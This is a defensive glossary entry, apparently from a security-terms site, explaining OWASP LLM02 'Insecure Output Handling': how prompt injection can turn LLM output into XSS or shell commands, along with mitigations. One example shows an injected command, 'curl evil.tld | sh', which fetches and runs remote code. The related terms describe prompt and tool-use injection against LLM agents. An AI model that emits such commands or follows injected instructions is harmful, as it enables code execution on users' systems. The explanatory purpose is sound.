Insecure Output Handling
What is Insecure Output Handling?
Insecure Output HandlingOWASP LLM02 — passing LLM-generated output directly into downstream systems (browsers, shells, SQL, code execution) without validation, turning a hallucination or prompt injection into XSS, RCE, or SSRF.
Insecure Output Handling is item LLM02 in the OWASP Top 10 for LLM Applications. It captures a deceptively simple mistake: treating model output as trusted text. When an application renders LLM responses in HTML, evaluates them as JavaScript, concatenates them into shell commands, executes them as code, or stuffs them into SQL, an attacker who can influence the prompt (directly or indirectly via retrieved content) controls whatever downstream sink consumes that output. The model becomes a confused-deputy that crosses trust boundaries on behalf of the attacker. Mitigations are conventional appsec hygiene applied to the LLM's egress: escape, sanitize, or template all output before HTML rendering; refuse to execute model-generated code outside a sandbox; validate structured outputs (e.g. JSON Schema, function-call argument types) before dispatch; require explicit allowlists for tools that take string arguments; and treat the LLM as an untrusted parser of intent, not a trusted producer of code.
● Examples
- 01
A markdown chatbot renders model output as HTML; an injection causes it to emit a malicious script tag that fires for every viewer.
- 02
An assistant returns a shell command that the app pipes into bash; a prompt injection turns 'list files' into 'list files; curl evil.tld | sh'.
● Frequently asked questions
What is Insecure Output Handling?
OWASP LLM02 — passing LLM-generated output directly into downstream systems (browsers, shells, SQL, code execution) without validation, turning a hallucination or prompt injection into XSS, RCE, or SSRF. It belongs to the AI & ML Security category of cybersecurity.
What does Insecure Output Handling mean?
OWASP LLM02 — passing LLM-generated output directly into downstream systems (browsers, shells, SQL, code execution) without validation, turning a hallucination or prompt injection into XSS, RCE, or SSRF.
How does Insecure Output Handling work?
Insecure Output Handling is item LLM02 in the OWASP Top 10 for LLM Applications. It captures a deceptively simple mistake: treating model output as trusted text. When an application renders LLM responses in HTML, evaluates them as JavaScript, concatenates them into shell commands, executes them as code, or stuffs them into SQL, an attacker who can influence the prompt (directly or indirectly via retrieved content) controls whatever downstream sink consumes that output. The model becomes a confused-deputy that crosses trust boundaries on behalf of the attacker. Mitigations are conventional appsec hygiene applied to the LLM's egress: escape, sanitize, or template all output before HTML rendering; refuse to execute model-generated code outside a sandbox; validate structured outputs (e.g. JSON Schema, function-call argument types) before dispatch; require explicit allowlists for tools that take string arguments; and treat the LLM as an untrusted parser of intent, not a trusted producer of code.
How do you defend against Insecure Output Handling?
Defences for Insecure Output Handling typically combine technical controls and operational practices, as detailed in the full definition above.
What are other names for Insecure Output Handling?
Common alternative names include: LLM02, Unsanitized LLM output.
● Related terms
- ai-security№ 870
OWASP LLM Top 10
An OWASP-maintained list of the ten most critical security risks affecting applications that build on large language models.
- ai-security№ 969
Prompt Injection
An attack that overrides an LLM's original instructions by smuggling adversarial text into the prompt, causing the model to ignore safeguards or execute attacker-chosen actions.
- ai-security№ 586
Indirect Prompt Injection
A prompt-injection variant where malicious instructions are hidden inside third-party content (web pages, documents, emails) that an LLM later ingests through retrieval, browsing, or tool use.
- attacks№ 265
Cross-Site Scripting (XSS)
A web vulnerability that allows attackers to inject malicious scripts into pages viewed by other users, executing in the victim's browser under the site's origin.
- attacks№ 224
Command Injection
An attack where user input is passed unsanitized to an operating-system shell, causing the application to execute attacker-supplied commands.
- ai-security№ 1285
Tool-Use Injection
Attacks that manipulate an LLM agent's tool-calling layer — forging tool arguments, smuggling instructions through tool outputs, or coaxing the model into calling unsanctioned tools.